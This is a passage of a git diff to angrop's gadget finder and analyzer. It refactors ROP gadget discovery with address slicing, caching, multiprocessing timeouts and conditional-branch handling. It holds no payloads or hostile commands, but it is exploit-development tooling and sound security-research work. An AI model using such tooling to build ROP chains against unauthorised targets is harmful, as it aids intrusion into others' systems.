GadgetFinder: a class to find ROP gadgets """ def __init__(self, project, fast_mode=None, only_check_near_rets=True, max_block_size=None, - max_sym_mem_access=None, is_thumb=False, kernel_mode=False, stack_gsize=80): + max_sym_mem_access=None, is_thumb=False, kernel_mode=False, stack_gsize=80, + cond_br=False, max_bb_cnt=2): # configurations self.project = project self.fast_mode = fast_mode @@ -60,6 +91,8 @@ def __init__(self, project, fast_mode=None, only_check_near_rets=True, max_block self.only_check_near_rets = only_check_near_rets self.kernel_mode = kernel_mode self.stack_gsize = stack_gsize + self.cond_br = cond_br + self.max_bb_cnt = max_bb_cnt if only_check_near_rets and not isinstance(self.arch, (X86, AMD64, AARCH64)): l.warning("only_check_near_rets only makes sense for i386/amd64/aarch64, setting it to False") @@ -87,9 +120,10 @@ def __init__(self, project, 
fast_mode=None, only_check_near_rets=True, max_block logging.getLogger('angr.engines.vex.ccall').setLevel(logging.CRITICAL) logging.getLogger('angr.engines.vex.expressions.ccall').setLevel(logging.CRITICAL) logging.getLogger('angr.engines.vex.irop').setLevel(logging.CRITICAL) - logging.getLogger('angr.state_plugins.symbolic_memory').setLevel(logging.CRITICAL) logging.getLogger('pyvex.lifting.libvex').setLevel(logging.CRITICAL) - logging.getLogger('angr.procedures.cgc.deallocate').setLevel(logging.CRITICAL) + logging.getLogger('angr.state_plugins.symbolic_memory').setLevel(logging.CRITICAL) + logging.getLogger('angr.state_plugins.posix').setLevel(logging.CRITICAL) + logging.getLogger('angr.procedures').setLevel(logging.CRITICAL) @property def gadget_analyzer(self): @@ -100,10 +134,10 @@ def gadget_analyzer(self): def _initialize_gadget_analyzer(self): - if self.kernel_mode: + if self.kernel_mode or not self.only_check_near_rets: self._syscall_locations = [] else: - self._syscall_locations = self._get_syscall_locations_by_string() + self._syscall_locations = self._get_syscall_locations() # find locations to analyze if self.only_check_near_rets and not self._ret_locations: @@ -127,7 +161,9 @@ def _initialize_gadget_analyzer(self): num_to_check, self.arch.max_block_size) self._gadget_analyzer = gadget_analyzer.GadgetAnalyzer(self.project, self.fast_mode, arch=self.arch, - kernel_mode=self.kernel_mode, stack_gsize=self.stack_gsize) + kernel_mode=self.kernel_mode, + stack_gsize=self.stack_gsize, + cond_br=self.cond_br, max_bb_cnt=self.max_bb_cnt) def analyze_gadget(self, addr, allow_conditional_branches=None): g = self.gadget_analyzer.analyze_gadget(addr, allow_conditional_branches=allow_conditional_branches) @@ -138,27 +174,109 @@ def analyze_gadget(self, addr, allow_conditional_branches=None): g.project = self.project return g - def analyze_gadget_list(self, addr_list, processes=4, show_progress=True): - gadgets = [] + def _truncated_slices(self): + for cslice in 
self._slices_to_check(): + size = cslice[1] - cslice[0] + 1 + if size <= 0x100: + yield cslice + continue + while cslice[1] - cslice[0] + 1 > 0x100: + new = (cslice[0], cslice[0]+0xff) + cslice = (cslice[0]+0x100, cslice[1]) + yield new + yield cslice - initargs = (self.gadget_analyzer,) - iterable = addr_list + def _multiprocess_static_analysis(self, processes, show_progress, timeout): + """ + use multiprocessing to build the cache + """ + start = time.time() + task_len = self._num_addresses_to_check() + todos = [] + + t = None if show_progress: - iterable = tqdm.tqdm(iterable=iterable, smoothing=0, total=len(addr_list), - desc="ROP", maxinterval=0.5, dynamic_ncols=True) + t = tqdm.tqdm(smoothing=0, total=task_len, desc="ROP", maxinterval=0.5, dynamic_ncols=True) - func = partial(run_worker, allow_cond_branch=False) - with Pool(processes=processes, initializer=_set_global_gadget_analyzer, initargs=initargs) as pool: - it = pool.imap_unordered(func, iterable, chunksize=1) - for gs in it: - if gs: - gadgets += gs + initargs = (self.gadget_analyzer,) + with mp.Pool(processes=processes, initializer=_set_global_gadget_analyzer, initargs=initargs) as pool: + for n, results in pool.imap_unordered(worker_func1, self._truncated_slices(), chunksize=40): + if t: + t.update(n) + for addr, h in results: + if addr is None: + continue + if h: + if h in self._cache: + self._cache[h].add(addr) + else: + self._cache[h] = {addr} + todos.append(addr) + else: + todos.append(addr) + if timeout is not None and time.time() - start > timeout: + break + + remaining = None + if timeout is not None: + remaining = timeout - (time.time() - start) + return todos, remaining + + def _analyze_gadgets_multiprocess(self, processes, tasks, show_progress, timeout, cond_br): + gadgets = [] + start = time.time() + + # select the target function + if cond_br is not None: + func = partial(worker_func2, cond_br=cond_br) + else: + func = worker_func2 + + # the progress bar + t = None + if show_progress: + t 
= tqdm.tqdm(smoothing=0, total=len(tasks), desc="ROP", maxinterval=0.5, dynamic_ncols=True) + + # prep for the main loop + sync_data = [time.time(), 0] + def on_success(gs): + gadgets.extend(gs) + if t: + t.update(1) + sync_data[0] = time.time() + sync_data[1] += 1 + + # the main loop + initargs = (self.gadget_analyzer,) + with mp.Pool(processes=processes, initializer=_set_global_gadget_analyzer, initargs=initargs) as pool: + for addr in tasks: + pool.apply_async(func, args=(addr,), callback=on_success) + pool.close() + + def should_continue(): + if sync_data[1] == len(tasks): + return False + if sync_data[1] > len(tasks)*0.8: + return time.time() - sync_data[0] < ANALYZE_GADGET_TIMEOUT + return time.time() - sync_data[0] < ANALYZE_GADGET_TIMEOUT*5 + + while should_continue(): + if timeout and time.time() - start > timeout: + break + time.sleep(0.1) + + pool.terminate() + if t is not None: + t.close() for g in gadgets: g.project = self.project return sorted(gadgets, key=lambda x: x.addr) + def analyze_gadget_list(self, addr_list, processes=4, show_progress=True): + return self._analyze_gadgets_multiprocess(processes, addr_list, show_progress, None, False) + def get_duplicates(self): """ return duplicates that have been seen at least twice @@ -166,32 +284,13 @@ def get_duplicates(self): cache = self._cache return {k:v for k,v in cache.items() if len(v) >= 2} - def find_gadgets(self, processes=4, show_progress=True): + def find_gadgets(self, processes=4, show_progress=True, timeout=None): + assert self.gadget_analyzer is not None self._cache = {} - - initargs = (self.gadget_analyzer,) - with Pool( - processes=processes, - initializer=_set_global_gadget_analyzer, - initargs=initargs, - # There is some kind of memory leak issue involving z3, - # so we periodically restart the worker processes. 
- maxtasksperchild=64, - ) as pool: - gadgets = list( - itertools.chain.from_iterable( - pool.imap_unordered( - run_worker, - self._addresses_to_check_with_caching(show_progress), - chunksize=5, - ) - ) - ) - - for g in gadgets: - g.project = self.project - - return sorted(gadgets, key=lambda x: x.addr), self.get_duplicates() + timeout1 = timeout/2 if timeout is not None else None + tasks, remaining = self._multiprocess_static_analysis(processes, show_progress, timeout1) + timeout = remaining+timeout/2 if timeout is not None else None + return self._analyze_gadgets_multiprocess(processes, tasks, show_progress, timeout, None), self.get_duplicates() def find_gadgets_single_threaded(self, show_progress=True): gadgets = [] @@ -213,78 +312,158 @@ def find_gadgets_single_threaded(self, show_progress=True): return sorted(gadgets, key=lambda x: x.addr), self.get_duplicates() - def _block_has_ip_relative(self, addr, bl): + #### generate addresses from slices #### + @staticmethod + def _addr_block_in_cache(analyzer, loc, skip_cache, cache): """ - Checks if a block has any ip relative instructions + To avoid loading the block, we first check if the data that we would + disassemble is already in the cache first """ - # if thumb mode, the block needs to parsed very carefully - if addr & 1 == 1 and self.project.arch.bits == 32 and self.project.arch.name.startswith('ARM'): - # thumb mode has this conditional instruction thingy, which is terrible for vex statement - # comparison. 
We inject a ton of fake statements into the program to ensure vex that this gadget - # is not a conditional instruction - MMAP_ADDR = 0x1000 - test_addr = MMAP_ADDR + 0x200+1 - if self.project.loader.memory.min_addr > MMAP_ADDR: - # a ton of `pop {pc}` - self.project.loader.memory.add_backer(MMAP_ADDR, b'\x00\xbd'*0x100+b'\x00'*0x200) - - # create the block without using the cache - engine = self.project.factory.default_engine - bk = engine._use_cache - engine._use_cache = False - self.project.loader.memory.store(test_addr-1, bl.bytes + b'\x00'*(0x200-len(bl.bytes))) - bl2 = self.project.factory.block(test_addr) - engine._use_cache = bk - else: - test_addr = 0x41414140 + addr % 0x10 - bl2 = self.project.factory.block(test_addr, insn_bytes=bl.bytes) - - # now diff the blocks to see whether anything constants changes - try: - diff_constants = differing_constants(bl, bl2) - except UnmatchedStatementsException: - return True - # check if it changes if we move it - bl_end = addr + bl.size - bl2_end = test_addr + bl2.size - filtered_diffs = [] - for d in diff_constants: - if d.value_a < addr or d.value_a >= bl_end or \ - d.value_b < test_addr or d.value_b >= bl2_end: - filtered_diffs.append(d) - return len(filtered_diffs) > 0 + data = analyzer.project.loader.memory.load(loc, analyzer.arch.max_block_size) + align = analyzer.arch.alignment + for i in range(align, len(data)+1, align): + h = data[0:i] + if h in skip_cache or h in cache: + return True + return False - def _addresses_to_check_with_caching(self, show_progress=True): - num_addrs = self._num_addresses_to_check() + @staticmethod + def _addresses_from_slice(analyzer, cslice, skip_cache, cache, it): + offset = 1 if isinstance(analyzer.arch, ARM) and analyzer.arch.is_thumb else 0 + alignment = analyzer.arch.alignment + max_block_size = analyzer.arch.max_block_size + + def do_update(): + if it is not None: + it.update(1) + + skip_addrs = set() + simple_cache = set() + for addr in range(cslice[0], cslice[1]+1, 
alignment): + # when loading from memory, use loc + # when calling block, use addr + loc = addr + addr += offset # this is the actual address + + if addr in skip_addrs: + do_update() + continue - iterable = self._addresses_to_check() - if show_progress: - iterable = tqdm.tqdm(iterable=iterable, smoothing=0, total=num_addrs, - desc="ROP", maxinterval=0.5, dynamic_ncols=True) + if GadgetFinder._addr_block_in_cache(analyzer, loc, skip_cache, cache): + do_update() + continue - for a in iterable: try: - bl = self.project.factory.block(a) - if bl.size > self.arch.max_block_size: - continue + bl = analyzer.project.factory.block(addr, skip_stmts=True, max_size=analyzer.arch.max_block_size+0x10) except (SimEngineError, SimMemoryError): + do_update() + continue + # check size + if bl.size > max_block_size: + for ins_addr in bl.instruction_addrs: + size = bl.size-(ins_addr-addr) + if size > max_block_size: + skip_addrs.add(ins_addr) + do_update() continue - if self._is_simple_gadget(a, bl): - h = self.block_hash(bl) - if h not in self._cache: - self._cache[h] = {a} + # check jumpkind + jumpkind = bl.vex_nostmt.jumpkind + if jumpkind == 'Ijk_NoDecode': + do_update() + continue + if jumpkind in ('Ijk_SigTRAP', 'Ijk_Privileged', 'Ijk_Yield'): + for ins_addr in bl.instruction_addrs: + bad = bl.bytes[ins_addr-addr:] + skip_cache.add(bad) + skip_addrs.add(ins_addr) + do_update() + continue + if analyzer._fast_mode and jumpkind not in ("Ijk_Ret", "Ijk_Boring") and \ + not jumpkind.startswith('Ijk_Sys_'): + for ins_addr in bl.instruction_addrs: + bad = bl.bytes[ins_addr-addr:] + skip_cache.add(bad) + skip_addrs.add(ins_addr) + do_update() + continue + # check conditional jumps + if not analyzer._allow_conditional_branches and len(bl.vex_nostmt.constant_jump_targets) > 1: + for ins_addr in bl.instruction_addrs: + bad = bl.bytes[ins_addr-addr:] + skip_cache.add(bad) + skip_addrs.add(ins_addr) + do_update() + continue + # make sure all the jump targets are valid + valid = True + for 
target in bl.vex_nostmt.constant_jump_targets: + if analyzer.project.loader.find_segment_containing(target) is None: + valid = False + if not valid: + for ins_addr in bl.instruction_addrs: + skip_addrs.add(ins_addr) + do_update() + continue + + # it doesn't make sense to include a gadget that starts with a jump or call + # the jump target itself will be the gadget + if bl.vex_nostmt.instructions == 1 and jumpkind in ('Ijk_Boring', 'Ijk_Call'): + do_update() + continue + + ####### use vex ######## + if not analyzer._block_make_sense_vex(bl) or not analyzer._block_make_sense_sym_access(bl) or \ + not analyzer.arch.block_make_sense(bl): + do_update() + continue + if not bl.capstone.insns: + do_update() + continue + + # we only analyze simple gadgets once + h = None + if addr in simple_cache or analyzer._is_simple_gadget(addr, bl): + # if a block is simple, all aligned sub blocks are simple + for ins_addr in bl.instruction_addrs: + simple_cache.add(ins_addr) + h = analyzer.block_hash(bl) + if h not in cache: + cache[h] = {addr} else: - # we only return the first unique gadget - # so skip duplicates - self._cache[h].add(a) - continue - yield a + cache[h].add(addr) + elif jumpkind.startswith("Ijk_Sys_"): + h = analyzer.block_hash(bl) + else: + s = '' + for insn in bl.capstone.insns: + s += insn.mnemonic + '\t' + insn.op_str + '\n' + h = hash(s) + do_update() + yield addr, h + + def _addresses_to_check_with_caching(self, show_progress=True): + """ + The goal of this function is to do a fast check of the block + only jumpkind, jump targets check and cache the result to avoid the need of symbolically + analyzing a ton of gadget candidates + """ + num_addrs = self._num_addresses_to_check() + + it = None + if show_progress: + it = tqdm.tqdm(smoothing=0, total=num_addrs, + desc="ROP", maxinterval=0.5, dynamic_ncols=True) + self._cache = {} + skip_cache = set() # bytes to skip + for cslice in self._slices_to_check(): + for addr, _ in 
self._addresses_from_slice(self.gadget_analyzer, cslice, skip_cache, self._cache, it): + yield addr def block_hash(self, block): """ a hash to uniquely identify a simple block """ - if block.vex.jumpkind == 'Ijk_Sys_syscall': + if block.vex.jumpkind.startswith('Ijk_Sys_'): next_addr = block.addr + block.size obj = self.project.loader.find_object_containing(next_addr) if not obj: @@ -293,6 +472,7 @@ def block_hash(self, block): return block.bytes + next_block.bytes return block.bytes + #### generate slices to analyze #### def _get_executable_ranges(self): """ returns the ranges which are executable @@ -325,55 +505,105 @@ def _addr_in_executable_memory(self, addr): return True return False - def _addresses_to_check(self): + def _find_executable_range(self, addr): + for r in self._get_executable_ranges(): + if r.contains_addr(addr): + return r + return None + + def _get_slice_by_addr(self, addr, blocksize): + start = addr - blocksize + end = addr + seg = self._find_executable_range(addr) + assert seg is not None + start = max(start, seg.min_addr) + return (start, end) + + @staticmethod + def merge_slices(slices): """ - :return: all the addresses to check + generate a list of slices that don't overlap + """ + if not slices: + return [] + + # sort by start of each slice + slices.sort(key=lambda x: x[0]) + + merged = [slices[0]] + for current in slices[1:]: + last = merged[-1] + if current[0] <= last[1]: # overlapping + merged[-1] = (last[0], max(last[1], current[1])) # merge + else: + merged.append(current) + return merged + + def _slices_to_check(self, do_sort=True): + """ + :return: all the slices to check, slice is inclusive: [start, end] """ - # align block size alignment = self.arch.alignment - offset = 1 if isinstance(self.arch, ARM) and self.arch.is_thumb else 0 + blocksize = (self.arch.max_block_size & ((1 << self.project.arch.bits) - alignment)) + alignment + if self.only_check_near_rets: - block_size = (self.arch.max_block_size & ((1 << self.project.arch.bits) 
- alignment)) + alignment - slices = [(addr-block_size, addr) for addr in self._ret_locations] - current_addr = 0 - for st, _ in slices: - current_addr = max(current_addr, st) - end_addr = st + block_size + alignment - for i in range(current_addr, end_addr, alignment): - if self._addr_in_executable_memory(i): - yield i+offset - current_addr = max(current_addr, end_addr) + slices = [] + if not self.arch.kernel_mode and self._syscall_locations: + slices += [self._get_slice_by_addr(addr, blocksize) for addr in self._syscall_locations] + if self._ret_locations: + slices += [self._get_slice_by_addr(addr, blocksize) for addr in self._ret_locations] + + # avoid decoding one address multiple times + slices = self.merge_slices(slices) + if not do_sort: + yield from slices + return + + # prioritize syscalls, so we still have syscall gadgets even if we timeout during gadget analysis + start = time.time() + syscall_locations = sorted(list(self._syscall_locations)) + slices1 = [] + for s in slices: + if not syscall_locations: + break + loc = syscall_locations[0] + if s[0] <= loc <= s[1]: + slices1.append(s) + for idx in range(1, len(syscall_locations)): + if s[0] <= syscall_locations[idx] <= s[1]: + continue + break + else: + break + syscall_locations = syscall_locations[idx:] + slices2 = [s for s in slices if s not in slices1] + + yield from slices1 + slices2 else: - for addr in self._syscall_locations: - yield addr+offset for segment in self._get_executable_ranges(): - l.debug("Analyzing segment with address range: 0x%x, 0x%x", segment.min_addr, segment.max_addr) start = alignment * ((segment.min_addr + alignment - 1) // alignment) - for addr in range(start, start+segment.memsize, alignment): - yield addr+offset + end = segment.min_addr + segment.memsize + end -= end % alignment + end -= alignment # a slice is inclusive + yield (start, end) def _num_addresses_to_check(self): - if self.only_check_near_rets: - # TODO: This could probably be optimized further by fewer segments 
checks (i.e. iterating for segments and - # adding ranges instead of incrementing, instead of calling _addressses_to_check) although this is still a - # significant improvement. - return sum(1 for _ in self._addresses_to_check()) - else: - num = 0 - alignment = self.arch.alignment - for segment in self._get_executable_ranges(): - num += segment.memsize // alignment - return num + len(self._syscall_locations) + cnt = 0 + for cslice in self._slices_to_check(do_sort=False): + cnt += cslice[1] - cslice[0] + 1 + return cnt + #### identify ret/syscall locations #### def _get_ret_locations(self): """ :return: all the locations in the binary with a ret instruction """ - try: - return self._get_ret_locations_by_string() - except RopException: - pass + if self.arch.ret_insts: + return self._get_locations_by_strings(self.arch.ret_insts) + + l.warning("Only have ret strings for i386/amd64/aarch64/riscv") + l.warning("now start the slow path for identifying gadgets end with 'ret'") addrs = [] seen = set() @@ -403,22 +633,13 @@ def _get_ret_locations(self): return sorted(addrs) - def _get_ret_locations_by_string(self): - """ - uses a string filter to find the return instructions - :return: all the locations in the binary with a ret instruction - """ - if not self.arch.ret_insts: - raise RopException("Only have ret strings for i386/x86_64/aarch64") - return self._get_locations_by_strings(self.arch.ret_insts) - - def _get_syscall_locations_by_string(self): + def _get_syscall_locations(self): """ uses a string filter to find all the system calls instructions :return: all the locations in the binary with a system call instruction """ if not self.arch.syscall_insts: - l.warning("Only have syscall strings for i386 and x86_64") + l.warning("Only have syscall strings for i386/amd64/mips, fail to identify syscall strings") return [] return self._get_locations_by_strings(self.arch.syscall_insts) @@ -426,27 +647,8 @@ def _get_locations_by_strings(self, strings): fmt = b'(' + 
b')|('.join(strings) + b')' addrs = [] - state = self.project.factory.entry_state() for segment in self._get_executable_ranges(): - # angr is slow to read huge chunks - read_bytes = [] - for i in range(segment.min_addr, segment.min_addr+segment.memsize, 0x100): - read_size = min(0x100, segment.min_addr+segment.memsize-i) - read_bytes.append(state.solver.eval(state.memory.load(i, read_size), cast_to=bytes)) - read_bytes = b"".join(read_bytes) + read_bytes = self.project.loader.memory.load(segment.min_addr, segment.memsize) # find all occurrences of the ret_instructions addrs += [segment.min_addr + m.start() for m in re.finditer(fmt, read_bytes)] return sorted(addrs) - - def _is_simple_gadget(self, addr, block): - """ - is the gadget a simple gadget like - pop rax; ret - """ - if block.vex.jumpkind not in {'Ijk_Boring', 'Ijk_Call', 'Ijk_Ret', 'Ijk_Sys_syscall'}: - return False - if block.vex.constant_jump_targets: - return False - if self._block_has_ip_relative(addr, block): - return False - return True diff --git a/angrop/gadget_finder/gadget_analyzer.py b/angrop/gadget_finder/gadget_analyzer.py index 738397c7..7671ca28 100644 --- a/angrop/gadget_finder/gadget_analyzer.py +++ b/angrop/gadget_finder/gadget_analyzer.py @@ -1,14 +1,20 @@ +import math import ctypes import logging +import itertools from collections import defaultdict import angr import pyvex import claripy +from angr.analyses.bindiff import differing_constants +from angr.analyses.bindiff import UnmatchedStatementsException +from angr.errors import SimEngineError, SimMemoryError from .. 
import rop_utils from ..arch import get_arch, X86 -from ..rop_gadget import RopGadget, RopMemAccess, RopRegMove, PivotGadget, SyscallGadget +from ..rop_gadget import RopGadget, PivotGadget, SyscallGadget +from ..rop_effect import RopMemAccess, RopRegMove, RopRegPop from ..rop_block import RopBlock from ..errors import RopException, RegNotFoundException, RopTimeoutException @@ -19,7 +25,7 @@ class GadgetAnalyzer: """ find and analyze gadgets from binary code """ - def __init__(self, project, fast_mode, kernel_mode=False, arch=None, stack_gsize=80): + def __init__(self, project, fast_mode, kernel_mode=False, arch=None, stack_gsize=80, cond_br=False, max_bb_cnt=2): """ stack_gsize: number of controllable gadgets on the stack """ @@ -27,19 +33,18 @@ def __init__(self, project, fast_mode, kernel_mode=False, arch=None, stack_gsize self.project = project self.arch = get_arch(project, kernel_mode=kernel_mode) if arch is None else arch self._fast_mode = fast_mode - self._allow_conditional_branches = not self._fast_mode + self._allow_conditional_branches = cond_br + self._max_bb_cnt = max_bb_cnt # initial state that others are based off, all analysis should copy the state first and work on # the copied state self._stack_bsize = stack_gsize * self.project.arch.bytes # number of controllable bytes on stack - sym_reg_set = self.arch.reg_set.union({self.arch.base_pointer}) if isinstance(self.arch, X86): extra_reg_set = self.arch.segment_regs else: extra_reg_set = None - self._state = rop_utils.make_symbolic_state(self.project, sym_reg_set, - extra_reg_set=extra_reg_set, stack_gsize=stack_gsize, - fast_mode=self._fast_mode) + self._state = rop_utils.make_symbolic_state(self.project, self.arch.reg_list, stack_gsize, + extra_reg_set=extra_reg_set, symbolize_got=True) self._concrete_sp = self._state.solver.eval(self._state.regs.sp) def analyze_gadget(self, addr, allow_conditional_branches=None) -> list[RopGadget] | RopGadget | None: @@ -95,7 +100,7 @@ def filter_func(state): return 
simgr.DROP return None - simgr.run(n=2, filter_func=filter_func) + simgr.run(n=self._max_bb_cnt, filter_func=filter_func) simgr.move(from_stash='active', to_stash='syscall', filter_func=lambda s: rop_utils.is_in_kernel(self.project, s)) @@ -109,6 +114,8 @@ def filter_func(state): return [], [] except RopTimeoutException: return [], [] + except (ctypes.ArgumentError, RecursionError): + return [], [] final_states = list(simgr.unconstrained) if "syscall" in simgr.stashes: @@ -124,7 +131,7 @@ def _analyze_gadget(self, addr, allow_conditional_branches): # Step 1: first statically check if the block can reach stopping states # static analysis is much faster - if not self._can_reach_stopping_states(addr, allow_conditional_branches): + if not self._can_reach_stopping_states(addr, allow_conditional_branches, max_steps=self._max_bb_cnt): return [] # Step 2: get all potential successor states @@ -170,7 +177,7 @@ def _analyze_gadget(self, addr, allow_conditional_branches): continue except (angr.errors.AngrError, angr.errors.AngrRuntimeError, angr.errors.SimError): continue - except ctypes.ArgumentError as e: + except (ctypes.ArgumentError, RecursionError): continue return gadgets @@ -178,6 +185,10 @@ def _analyze_gadget(self, addr, allow_conditional_branches): def _valid_state(self, init_state, final_state): if self._change_arch_state(init_state, final_state): return False + # stack change is too large + if not final_state.regs.sp.symbolic and \ + final_state.regs.sp.concrete_value - self._concrete_sp > self._stack_bsize: + return False return True def _change_arch_state(self, init_state, final_state): @@ -190,47 +201,89 @@ def _change_arch_state(self, init_state, final_state): return True return False - def _block_make_sense(self, addr): - """ - Checks if a block at addr makes sense to analyze for rop gadgets - :param addr: the address to check - :return: True or False - """ - try: - l.debug("... 
checking if block makes sense") - block = self.project.factory.block(addr) - - if not block.capstone.insns: - return False - - if not self.arch.block_make_sense(block): + def _block_make_sense_nostmt(self, block): + if block.size > self.arch.max_block_size: + l.debug("... too long") + return False + if block.vex.jumpkind in ('Ijk_SigTRAP', 'Ijk_NoDecode', 'Ijk_Privileged', 'Ijk_Yield'): + l.debug("... not decodable") + return False + for target in block.vex.constant_jump_targets: + if self.project.loader.find_segment_containing(target) is None: return False - - if block.vex.jumpkind == 'Ijk_NoDecode': - l.debug("... not decodable") + if self._fast_mode: + if block.vex.jumpkind != "Ijk_Ret" and not block.vex.jumpkind.startswith("Ijk_Sys"): return False + return True - if self._fast_mode: - if block.vex.jumpkind != "Ijk_Ret" and not block.vex.jumpkind.startswith("Ijk_Sys"): - return False + def _block_make_sense_vex(self, block): + # we don't like floating point and SIMD stuff + if any(t in block.vex.tyenv.types for t in ('Ity_F16', 'Ity_F32', 'Ity_F64', 'Ity_F128', 'Ity_V128')): + return False - if any(isinstance(s, pyvex.IRStmt.Dirty) for s in block.vex.statements): - l.debug("... has dirties that we probably can't handle") - return False + if any(isinstance(s, pyvex.IRStmt.Dirty) for s in block.vex.statements): + l.debug("... has dirties that we probably can't handle") + return False - for op in block.vex.operations: - if op.startswith("Iop_Div"): - return False + # make sure all constant memory accesses are in-bound + for expr in block.vex.expressions: + if expr.tag in ('Iex_Load', 'Ist_Store'): + if isinstance(expr.addr, pyvex.expr.Const): + if self.project.loader.find_segment_containing(expr.addr.con.value) is None: + return False - if block.size > self.arch.max_block_size: - l.debug("... 
too long") + for op in block.vex.operations: + if op.startswith("Iop_Div"): return False - # we don't like floating point stuff - if "Ity_F16" in block.vex.tyenv.types or "Ity_F32" in block.vex.tyenv.types \ - or "Ity_F64" in block.vex.tyenv.types or "Ity_F128" in block.vex.tyenv.types: - return False + return True + + def _block_make_sense_sym_access(self, block): + # make sure there are not too many symbolic accesses + # note that we can't actually distinguish between memory accesses on stack + # and other memory accesses, we just assume all non-word access are symbolic memory accesses + # consider at most one access each instruction + + # split statements by instructions + accesses = set() + word_ty = f'Ity_I{self.project.arch.bits}' + insts = [] + inst = [] + for stmt in block.vex.statements: + if isinstance(stmt, pyvex.stmt.IMark): + insts.append(inst) + inst = [] + else: + inst.append(stmt) + if inst: + insts.append(inst) + # count memory accesses + for inst in insts: + exprs = itertools.chain(*[x.expressions for x in inst]) + for expr in exprs: + if expr.tag not in ('Iex_Load', 'Ist_Store'): + continue + if isinstance(expr.addr, pyvex.expr.Const): + continue + if expr.ty == word_ty: + continue + accesses.add(str(expr.addr)) + break + if len(accesses) > self.arch.max_sym_mem_access: + return False + return True + def _block_make_sense(self, addr): + """ + Checks if a block at addr makes sense to analyze for rop gadgets + :param addr: the address to check + :return: True or False + """ + if self.project.loader.find_object_containing(addr) != self.project.loader.main_object: + return False + try: + l.debug("... checking if block makes sense") + block = self.project.factory.block(addr) except angr.errors.SimEngineError: l.debug("... 
some simengine error") return False @@ -253,6 +306,20 @@ def _block_make_sense(self, addr): except KeyError: return False + if not self._block_make_sense_nostmt(block): + return False + if not self._block_make_sense_vex(block): + return False + if not self._block_make_sense_sym_access(block): + return False + + if not self.arch.block_make_sense(block): + return False + + if not block.capstone.insns: + return False + + return True def is_in_kernel(self, state): @@ -270,6 +337,13 @@ def _can_reach_stopping_states(self, addr, allow_conditional_branches, max_steps return False b = self.project.factory.block(addr) + + if max_steps == self._max_bb_cnt: # this is the very first basic block + # it doesn't make sense to have a gadget that starts with a conditional jump + # this type of gadgets should be represented by two gadgets after the jump + if b._instructions == 1 and len(b.vex.constant_jump_targets) > 1: + return False + constant_jump_targets = list(b.vex.constant_jump_targets) if not constant_jump_targets: @@ -341,13 +415,21 @@ def _effect_analysis(self, gadget, init_state, final_state, ctrl_type, do_cond_b if gadget.pc_offset >= gadget.stack_change: return None case 'jmp_reg': # record pc_reg + # TODO: we should support gadgets like `add rax, 0x1000; call rax` + # use test_chainbuilder.test_normalize_call as the testcase + if final_state.ip.depth > 1: + return None gadget.pc_reg = list(final_state.ip.variables)[0].split('_', 1)[1].rsplit('-')[0] case 'jmp_mem': # record pc_target + # TODO: we currently don't support jmp_mem gadgets that look like + # pop rax; pop rbx; jmp [rax+rbx] for a in reversed(final_state.history.actions): if a.type == 'mem' and a.action == 'read' and a.size == arch_bits: if (a.data.ast == final_state.ip).is_true(): gadget.pc_target = a.addr.ast break + if gadget.pc_target is None: + return None # register effect analysis l.info("... 
checking for controlled regs") @@ -355,7 +437,8 @@ def _effect_analysis(self, gadget, init_state, final_state, ctrl_type, do_cond_b l.debug("... checking for reg moves") self._check_reg_change_dependencies(init_state, final_state, gadget) self._check_reg_movers(init_state, final_state, gadget) - self._analyze_concrete_regs(init_state, final_state, gadget) + self._analyze_concrete_regs(final_state, gadget) + self._check_pop_equal_set(gadget, final_state) # memory access analysis l.debug("... analyzing mem accesses") @@ -373,35 +456,63 @@ def _effect_analysis(self, gadget, init_state, final_state, ctrl_type, do_cond_b # conditional branch analysis if do_cond_branch: - constraint_vars = { - var - for constraint in final_state.history.jump_guards - for var in constraint.variables - } - - gadget.has_conditional_branch = len(constraint_vars) > 0 - - for action in final_state.history.actions: - if action.type == 'mem': - constraint_vars |= action.addr.variables - - for var in constraint_vars: - if var.startswith("sreg_"): - gadget.constraint_regs.add(var.split('_', 1)[1].split('-', 1)[0]) - elif not var.startswith("symbolic_stack_"): - l.debug("... 
constraint not controlled by registers and stack") - return None + gadget = self._cond_branch_analysis(gadget, final_state) + return gadget - gadget.popped_regs = { - reg - for reg in gadget.popped_regs - if final_state.registers.load(reg).variables.isdisjoint(constraint_vars) - } + @staticmethod + def _cond_branch_analysis(gadget, final_state): + # list all conditional branch dependencies + branch_guards = set() + branch_guard_vars = set() + for guard in final_state.history.jump_guards: + if claripy.is_true(guard): + continue + branch_guards.add(guard) + branch_guard_vars |= guard.variables + + # make sure all guards are controllable by us + for var in branch_guard_vars: + if var.startswith('sreg_') or var.startswith('symbolic_stack_'): + continue + return None - gadget.popped_reg_vars = { - reg: final_state.registers.load(reg).variables - for reg in gadget.popped_regs - } + # we do not consider a gadget having conditional branch if the branch guards can be set by itself + gadget.has_conditional_branch = any(not v.startswith('symbolic_stack_') for v in branch_guard_vars) + #gadget.has_conditional_branch = any(not v.startswith('symbolic_stack_') for v in branch_guard_vars) + + # if there is no conditional branch, good, we just finished the analysis + if not branch_guards: + return gadget + + # now analyze the branch dependencies and filter out gadgets that we do not support yet + # TODO: support more guards such as existing flags + def handle_constrained_var(var): + if var.startswith("sreg_"): + gadget.branch_dependencies.add(var.split('_', 1)[1].split('-', 1)[0]) + elif var.startswith("symbolic_stack_"): + # we definitely can control this, but remove it from reg_pops + to_remove = set() + for pop in gadget.reg_pops: + reg = pop.reg + reg_val = final_state.registers.load(reg) + if var in reg_val.variables: + to_remove.add(pop) + gadget.reg_pops -= to_remove + + for guard in branch_guards: + if len(guard.variables) > 1: + for var in guard.variables: + 
handle_constrained_var(var) + else: + var = list(guard.variables)[0] + arg0 = guard.args[0] + arg1 = guard.args[1] + ast = arg0 if arg0.symbolic else arg1 + if rop_utils.loose_constrained_check(final_state, ast, extra_constraints=[guard]): + if var.startswith("sreg_"): + gadget.branch_dependencies.add(var.split('_', 1)[1].split('-', 1)[0]) + continue + handle_constrained_var(var) return gadget @@ -411,7 +522,13 @@ def _create_gadget(self, addr, init_state, final_state, ctrl_type, do_cond_branc # gadgets that do syscall and pivoting are too complicated if self._does_pivot(final_state): return None - prologue_state = rop_utils.step_to_syscall(init_state) + + # FIXME: this try-except here is specifically for MIPS because angr + # does not handle breakpoints in MIPS well + try: + prologue_state = rop_utils.step_to_syscall(init_state) + except RuntimeError: + return None g = RopGadget(addr=addr) if init_state.addr != prologue_state.addr: self._effect_analysis(g, init_state, prologue_state, None, do_cond_branch) @@ -425,21 +542,17 @@ def _create_gadget(self, addr, init_state, final_state, ctrl_type, do_cond_branc gadget = self._effect_analysis(gadget, init_state, final_state, ctrl_type, 